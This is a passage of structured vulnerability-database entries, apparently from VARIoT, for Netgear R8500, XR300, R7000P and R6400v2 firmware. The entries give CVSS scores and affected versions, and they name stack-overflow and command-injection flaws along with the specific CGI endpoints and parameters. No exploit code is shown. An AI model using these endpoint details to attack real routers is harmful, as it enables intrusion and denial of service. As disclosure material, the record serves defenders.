"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2192",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"cve": "CVE-2024-52013",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52013",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-024156",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52013",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024156",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at wiz_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52013"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52013",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024156",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"id": "VAR-202411-2192",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-27T23:38:30.915000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_43/43.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52013"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"date": "2024-11-05T15:15:26.347000",
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-23T02:52:00",
"db": "JVNDB",
"id": "JVNDB-2024-024156"
},
{
"date": "2025-05-21T20:24:21.147000",
"db": "NVD",
"id": "CVE-2024-52013"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024156"
}
],
"trust": 0.8
}
}
VAR-202411-3146
Vulnerability from variot - Updated: 2025-05-23 23:23Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a command injection vulnerability in the component ap_mode.cgi via the apmode_gateway parameter. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. R8500 firmware, XR300 firmware, R7000P For multiple Netgear products such as firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-3146",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"cve": "CVE-2024-51010",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51010",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-024105",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51010",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024105",
"trust": 0.8,
"value": "High"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a command injection vulnerability in the component ap_mode.cgi via the apmode_gateway parameter. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. R8500 firmware, XR300 firmware, R7000P For multiple Netgear products such as firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51010"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51010",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024105",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"id": "VAR-202411-3146",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-23T23:23:13.757000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_48/48.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51010"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"date": "2024-11-05T15:15:24.887000",
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T06:49:00",
"db": "JVNDB",
"id": "JVNDB-2024-024105"
},
{
"date": "2025-05-21T19:59:27.137000",
"db": "NVD",
"id": "CVE-2024-51010"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "in multiple NETGEAR products. \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024105"
}
],
"trust": 0.8
}
}
VAR-202411-2011
Vulnerability from variot - Updated: 2025-05-23 23:20Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at genie_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2011",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"cve": "CVE-2024-52014",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52014",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-024070",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52014",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024070",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at genie_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52014"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52014",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024070",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"id": "VAR-202411-2011",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-23T23:20:49.575000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_43/43.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52014"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"date": "2024-11-05T15:15:26.430000",
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T01:28:00",
"db": "JVNDB",
"id": "JVNDB-2024-024070"
},
{
"date": "2025-05-21T20:24:11.200000",
"db": "NVD",
"id": "CVE-2024-52014"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024070"
}
],
"trust": 0.8
}
}
VAR-202411-2191
Vulnerability from variot - Updated: 2025-05-23 23:18Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a command injection vulnerability in the component wlg_adv.cgi via the apmode_gateway parameter. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. R8500 firmware, XR300 firmware, R7000P A command injection vulnerability exists in the firmware and other parts of multiple NETGEAR products.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2191",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
